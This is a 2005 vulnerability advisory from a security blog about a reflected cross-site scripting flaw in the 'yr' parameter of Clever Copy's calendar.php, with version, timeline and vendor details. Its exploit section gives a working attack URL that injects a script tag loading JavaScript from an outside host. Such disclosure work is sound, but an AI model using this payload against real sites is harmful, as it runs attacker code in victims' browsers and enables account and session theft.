################################################
Clever copy 'calendar.php' 'yr' variable cross site scripting
vendor url:http://clevercopy.bestdirectbuy.com
advisory:http://lostmon.blogspot.com/2005/07/
clever-copy-calendarphp-yr-variable.html
vendor notify: yes exploit available:yes
OSVDB ID:17919
Securitytracker: 1014492
BID: 14278
################################################
Clever Copy is a free, fully scalable web site portal and news posting
system.You can run it as a very simple blog or ramp it up to a full
Content Management System
Clever Copy contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate 'yr'
variable upon submission to 'calendar.php' script.This could allow a
user to create a specially crafted URL that would execute arbitrary
code in a user's browser within the trust relationship between
the browser and the server, leading to a loss of integrity
##############
VERSIONS
##############
Clever Copy version 2.0a
Clever Copy version 2.0
##############
SOLUTION
##############
No solution at this time
##############
TIMELINE
##############
Discovered: 12-07-2005
Vendor notify: 13-07-2005
Vendor response:14-07-2005
Disclosure: 15-07-2005
##############
EXPLOIT
##############
http://[victim]/calendar.php?mth=3&yr=2006"><script src="http://www.drorshalev.com/dev/injection/js.js"></script>
######################## €nd #############################
Thnx to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente...
Subscribe to:
Posts (Atom)